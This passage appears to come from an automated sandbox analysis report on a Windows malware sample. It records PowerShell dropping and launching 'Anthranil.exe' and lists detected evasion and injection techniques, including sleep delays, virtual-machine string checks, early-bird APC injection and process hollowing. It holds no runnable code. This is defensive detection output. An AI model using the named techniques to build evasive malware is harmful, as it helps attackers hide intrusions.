    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Switches to a custom stack to bypass stack traces
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exeAPI/Special instruction interceptor: Address: 3C71B47
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6829Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2813Jump to behavior
    Source: C:\Users\user\Desktop\AM983ebb5F.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsuD53D.tmp\nsExec.dllJump to dropped file
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3748Thread sleep time: -6456360425798339s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exe TID: 6704Thread sleep time: -190000s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\AM983ebb5F.exeCode function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C63
    Source: C:\Users\user\Desktop\AM983ebb5F.exeCode function: 0_2_004068B4 FindFirstFileW,FindClose,0_2_004068B4
    Source: C:\Users\user\Desktop\AM983ebb5F.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: ModuleAnalysisCache.1.drBinary or memory string: Remove-NetEventVmNetworkAdapter
    Source: ModuleAnalysisCache.1.drBinary or memory string: Add-NetEventVmNetworkAdapter
    Source: Anthranil.exe, 00000006.00000003.2615565193.0000000005E8A000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2626750886.0000000005E8A000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000002.3013439177.0000000005E45000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2603901435.0000000005E8A000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2592769349.0000000005E8A000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000002.3013439177.0000000005E82000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: ModuleAnalysisCache.1.drBinary or memory string: Get-NetEventVmNetworkAdapter
    Source: C:\Users\user\Desktop\AM983ebb5F.exeAPI call chain: ExitProcess graph end nodegraph_0-3285
    Source: C:\Users\user\Desktop\AM983ebb5F.exeAPI call chain: ExitProcess graph end nodegraph_0-3437
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Early bird code injection technique detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\Anthranil.exeJump to behavior
    Queues an APC in another process (thread injection)
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Users\user\AppData\Local\Temp\Anthranil.exeJump to behavior
    Sample uses process hollowing technique
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Users\user\AppData\Local\Temp\Anthranil.exe base address: 400000Jump to behavior
    Writes to foreign memory regions
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Anthranil.exe base: 1660000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Anthranil.exe "C:\Users\user\AppData\Local\Temp\Anthranil.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
